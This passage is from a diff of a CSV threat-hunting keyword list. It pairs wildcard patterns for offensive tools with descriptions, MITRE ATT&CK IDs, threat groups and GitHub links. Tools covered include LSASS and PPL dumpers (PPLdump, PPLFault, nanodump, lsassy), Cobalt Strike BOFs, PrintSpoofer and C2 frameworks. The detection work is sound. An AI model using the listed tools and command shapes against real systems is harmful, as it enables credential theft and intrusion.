process","T1012","TA0007","N/A","N/A","Reconnaissance","https://github.com/rasta-mouse/PPEnum","1","1","N/A","N/A","1","90","7","2023-05-10T16:41:09Z","2023-05-10T16:38:36Z" 
@@ -15042,71 +15210,71 @@
 "*ppldump *","offensive_tool_keyword","cobaltstrike","A faithful transposition of the key features/functionality of @itm4n's PPLDump project as a BOF.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/PPLDump_BOF","1","0","N/A","10","10","131","24","2021-09-24T07:10:04Z","2021-09-24T07:05:59Z"
 "*PPLdump*","offensive_tool_keyword","ppldump","Dump the memory of a PPL with a userland exploit","T1003 - T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/itm4n/PPLdump","1","1","N/A","N/A","8","774","137","2022-07-24T14:03:14Z","2021-04-07T13:12:47Z"
 "*PPLdump.exe*","offensive_tool_keyword","ppldump","Dump the memory of a PPL with a userland exploit","T1003 - T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/itm4n/PPLdump","1","1","N/A","N/A","8","774","137","2022-07-24T14:03:14Z","2021-04-07T13:12:47Z"
-"*ppldump.py*","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","1","N/A","N/A","10","1745","232","2023-07-19T10:46:59Z","2019-12-03T14:03:41Z" +"*ppldump.py*","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","1","N/A","N/A","10","1745","232","2023-10-04T19:25:30Z","2019-12-03T14:03:41Z" "*PPLDump_BOF.*","offensive_tool_keyword","cobaltstrike","A faithful transposition of the key features/functionality of @itm4n's PPLDump project as a BOF.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/PPLDump_BOF","1","1","N/A","10","10","131","24","2021-09-24T07:10:04Z","2021-09-24T07:05:59Z" -"*ppldump_embedded*","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - 
T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","1","N/A","N/A","10","1745","232","2023-07-19T10:46:59Z","2019-12-03T14:03:41Z" +"*ppldump_embedded*","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","1","N/A","N/A","10","1745","232","2023-10-04T19:25:30Z","2019-12-03T14:03:41Z" "*PPLdump64.exe*","offensive_tool_keyword","ppldump","Dump the memory of a PPL with a userland exploit","T1003 - T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/itm4n/PPLdump","1","1","N/A","N/A","8","774","137","2022-07-24T14:03:14Z","2021-04-07T13:12:47Z" "*PPLdumpDll*","offensive_tool_keyword","ppldump","Dump the memory of a PPL with a userland exploit","T1003 - T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/itm4n/PPLdump","1","1","N/A","N/A","8","774","137","2022-07-24T14:03:14Z","2021-04-07T13:12:47Z" -"*PPLFault.*","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","1","N/A","N/A","5","410","66","2023-10-03T20:00:34Z","2022-09-22T19:39:24Z" +"*PPLFault.*","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential 
Access","https://github.com/gabriellandau/PPLFault","1","1","N/A","N/A","5","411","68","2023-10-03T20:00:34Z","2022-09-22T19:39:24Z" "*pplfault.cna*","offensive_tool_keyword","cobaltstrike","Takes the original PPLFault and the original included DumpShellcode and combinds it all into a BOF targeting cobalt strike.","T1055 - T1078.003","TA0002 - TA0006","N/A","N/A","Credential Access","https://github.com/trustedsec/PPLFaultDumpBOF","1","1","N/A","N/A","2","115","11","2023-05-17T12:57:20Z","2023-05-16T13:02:22Z" -"*PPLFault.exe*","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","1","N/A","N/A","5","410","66","2023-10-03T20:00:34Z","2022-09-22T19:39:24Z" +"*PPLFault.exe*","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","1","N/A","N/A","5","411","68","2023-10-03T20:00:34Z","2022-09-22T19:39:24Z" "*PPLFaultDumpBOF*","offensive_tool_keyword","cobaltstrike","Takes the original PPLFault and the original included DumpShellcode and combinds it all into a BOF targeting cobalt strike.","T1055 - T1078.003","TA0002 - TA0006","N/A","N/A","Credential Access","https://github.com/trustedsec/PPLFaultDumpBOF","1","1","N/A","N/A","2","115","11","2023-05-17T12:57:20Z","2023-05-16T13:02:22Z" -"*PPLFault-Localhost-SMB.ps1*","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - 
TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","1","N/A","N/A","5","410","66","2023-10-03T20:00:34Z","2022-09-22T19:39:24Z" +"*PPLFault-Localhost-SMB.ps1*","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","1","N/A","N/A","5","411","68","2023-10-03T20:00:34Z","2022-09-22T19:39:24Z" "*PPLFaultPayload.dll*","offensive_tool_keyword","cobaltstrike","Takes the original PPLFault and the original included DumpShellcode and combinds it all into a BOF targeting cobalt strike.","T1055 - T1078.003","TA0002 - TA0006","N/A","N/A","Credential Access","https://github.com/trustedsec/PPLFaultDumpBOF","1","1","N/A","N/A","2","115","11","2023-05-17T12:57:20Z","2023-05-16T13:02:22Z" -"*PPLFaultPayload.dll*","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","1","N/A","N/A","5","410","66","2023-10-03T20:00:34Z","2022-09-22T19:39:24Z" +"*PPLFaultPayload.dll*","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","1","N/A","N/A","5","411","68","2023-10-03T20:00:34Z","2022-09-22T19:39:24Z" "*PPLFaultTemp*","offensive_tool_keyword","cobaltstrike","Takes the original PPLFault and the original included 
DumpShellcode and combinds it all into a BOF targeting cobalt strike.","T1055 - T1078.003","TA0002 - TA0006","N/A","N/A","Credential Access","https://github.com/trustedsec/PPLFaultDumpBOF","1","1","N/A","N/A","2","115","11","2023-05-17T12:57:20Z","2023-05-16T13:02:22Z" -"*PPLFaultTemp*","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","1","N/A","N/A","5","410","66","2023-10-03T20:00:34Z","2022-09-22T19:39:24Z" -"*PPLKiller.exe*","offensive_tool_keyword","PPLKiller","Tool to bypass LSA Protection (aka Protected Process Light)","T1547.002 - T1558.003","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/RedCursorSecurityConsulting/PPLKiller","1","1","N/A","10","8","744","127","2022-12-04T23:38:31Z","2020-07-06T10:11:49Z" -"*PPLKiller.sln*","offensive_tool_keyword","PPLKiller","Tool to bypass LSA Protection (aka Protected Process Light)","T1547.002 - T1558.003","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/RedCursorSecurityConsulting/PPLKiller","1","1","N/A","10","8","744","127","2022-12-04T23:38:31Z","2020-07-06T10:11:49Z" -"*PPLKiller.vcxproj*","offensive_tool_keyword","PPLKiller","Tool to bypass LSA Protection (aka Protected Process Light)","T1547.002 - T1558.003","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/RedCursorSecurityConsulting/PPLKiller","1","1","N/A","10","8","744","127","2022-12-04T23:38:31Z","2020-07-06T10:11:49Z" -"*PPLKiller-master*","offensive_tool_keyword","PPLKiller","Tool to bypass LSA Protection (aka Protected Process Light)","T1547.002 - T1558.003","TA0004 - TA0005","N/A","N/A","Defense 
Evasion","https://github.com/RedCursorSecurityConsulting/PPLKiller","1","1","N/A","10","8","744","127","2022-12-04T23:38:31Z","2020-07-06T10:11:49Z" +"*PPLFaultTemp*","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","1","N/A","N/A","5","411","68","2023-10-03T20:00:34Z","2022-09-22T19:39:24Z" +"*PPLKiller.exe*","offensive_tool_keyword","PPLKiller","Tool to bypass LSA Protection (aka Protected Process Light)","T1547.002 - T1558.003","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/RedCursorSecurityConsulting/PPLKiller","1","1","N/A","10","8","745","127","2022-12-04T23:38:31Z","2020-07-06T10:11:49Z" +"*PPLKiller.sln*","offensive_tool_keyword","PPLKiller","Tool to bypass LSA Protection (aka Protected Process Light)","T1547.002 - T1558.003","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/RedCursorSecurityConsulting/PPLKiller","1","1","N/A","10","8","745","127","2022-12-04T23:38:31Z","2020-07-06T10:11:49Z" +"*PPLKiller.vcxproj*","offensive_tool_keyword","PPLKiller","Tool to bypass LSA Protection (aka Protected Process Light)","T1547.002 - T1558.003","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/RedCursorSecurityConsulting/PPLKiller","1","1","N/A","10","8","745","127","2022-12-04T23:38:31Z","2020-07-06T10:11:49Z" +"*PPLKiller-master*","offensive_tool_keyword","PPLKiller","Tool to bypass LSA Protection (aka Protected Process Light)","T1547.002 - T1558.003","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/RedCursorSecurityConsulting/PPLKiller","1","1","N/A","10","8","745","127","2022-12-04T23:38:31Z","2020-07-06T10:11:49Z" "*PppEWCIgXbsepIwnuRIHtQLC*","offensive_tool_keyword","ThunderShell","ThunderShell is a C# RAT 
that communicates via HTTP requests. All the network traffic is encrypted using a second layer of RC4 to avoid SSL interception and defeat network detection on the target system. RC4 is a weak cipher and is used to help obfuscate the traffic. HTTPS options should be used to provide integrity and strong encryption.","T1021.002 - T1573.002 - T1001.003","TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Mr-Un1k0d3r/ThunderShell","1","1","N/A","10","10","759","254","2023-03-29T21:57:08Z","2017-09-12T01:11:29Z" -"*ppypykatz.py*","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","1","N/A","N/A","8","731","94","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z" +"*ppypykatz.py*","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","1","N/A","N/A","8","732","95","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z" "*praetorian.antihacker*","offensive_tool_keyword","cobaltstrike","PortBender is a TCP port redirection utility that allows a red team operator to redirect inbound traffic ","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - 
TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/praetorian-inc/PortBender","1","1","N/A","10","10","591","104","2023-01-31T09:44:16Z","2021-05-27T02:46:29Z" "*praetorian-inc/gato*","offensive_tool_keyword","gato","GitHub Self-Hosted Runner Enumeration and Attack Tool","T1083 - T1087 - T1081","TA0006 - TA0007","N/A","N/A","Reconnaissance","https://github.com/praetorian-inc/gato","1","1","N/A","N/A","3","263","24","2023-07-27T15:15:32Z","2023-01-06T15:43:27Z" "*praetorian-inc/noseyparker*","offensive_tool_keyword","noseyparker","Nosey Parker is a command-line program that finds secrets and sensitive information in textual data and Git history.","T1583 - T1059.001 - T1059.003","TA0002 - TA0003 - TA0040","N/A","N/A","Credential Access","https://github.com/praetorian-inc/noseyparker","1","1","N/A","8","10","1169","56","2023-09-25T21:13:22Z","2022-11-08T23:09:17Z" "*praetorian-inc/PortBender*","offensive_tool_keyword","cobaltstrike","PortBender is a TCP port redirection utility that allows a red team operator to redirect inbound traffic ","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - 
TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/praetorian-inc/PortBender","1","1","N/A","10","10","591","104","2023-01-31T09:44:16Z","2021-05-27T02:46:29Z" "*pre2k auth * --dc-ip *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*prepare_ppl_command_line*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" -"*prepareResponseForHiddenAPICall*","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. 
scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","10","10","820","138","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" +"*prepareResponseForHiddenAPICall*","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. 
scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","10","10","821","139","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" "*PrimusC2-main.zip*","offensive_tool_keyword","primusC2","another C2 framework","T1090 - T1071","TA0011 - TA0002","N/A","N/A","C2","https://github.com/Primusinterp/PrimusC2","1","1","N/A","10","10","42","4","2023-08-21T04:05:48Z","2023-04-19T10:59:30Z" "*print_shtinkering_crash_location*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. 
A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" "*printerbug.py *:*@* *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*PrinterNotifyPotato *","offensive_tool_keyword","DCOMPotato","Service DCOM Object and SeImpersonatePrivilege abuse.","T1548.002 - T1134.002","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/zcgonvh/DCOMPotato","1","0","N/A","10","4","326","46","2022-12-09T01:57:53Z","2022-12-08T14:56:13Z" "*PrinterNotifyPotato.*","offensive_tool_keyword","DCOMPotato","Service DCOM Object and SeImpersonatePrivilege abuse.","T1548.002 - T1134.002","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/zcgonvh/DCOMPotato","1","1","N/A","10","4","326","46","2022-12-09T01:57:53Z","2022-12-08T14:56:13Z" "*PrintNightmare.*","offensive_tool_keyword","spoolsploit","A collection of Windows print spooler exploits containerized with other utilities for practical exploitation.","T1204 - T1547 - T1562 - T1003 - T1018 - T1570 - T1005","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/BeetleChunks/SpoolSploit","1","0","N/A","N/A","6","533","90","2021-07-16T04:49:43Z","2021-07-07T00:32:28Z" -"*printnightmare_check*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - 
TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*printnightmare_check*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" "*printspoofer -Command*","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","0","N/A","10","10","401","83","2023-08-17T14:46:04Z","2020-11-09T08:05:16Z" "*PrintSpoofer-*","offensive_tool_keyword","cobaltstrike","Reflection dll implementation of PrintSpoofer used in conjunction with Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - 
FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/crisprss/PrintSpoofer","1","1","N/A","10","10","76","8","2021-10-07T17:45:00Z","2021-10-07T17:28:45Z" "*PrintSpoofer.*","offensive_tool_keyword","cobaltstrike","Reflection dll implementation of PrintSpoofer used in conjunction with Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/crisprss/PrintSpoofer","1","1","N/A","10","10","76","8","2021-10-07T17:45:00Z","2021-10-07T17:28:45Z" -"*PrintSpoofer.cpp*","offensive_tool_keyword","PrintSpoofer","Abusing Impersonation Privileges on Windows 10 and Server 2019","T1548.002 - T1055.001 - T1055.002","TA0005 - TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","1","N/A","10","10","1569","321","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z" -"*PrintSpoofer.cpp*","offensive_tool_keyword","printspoofer","Abusing impersonation privileges 
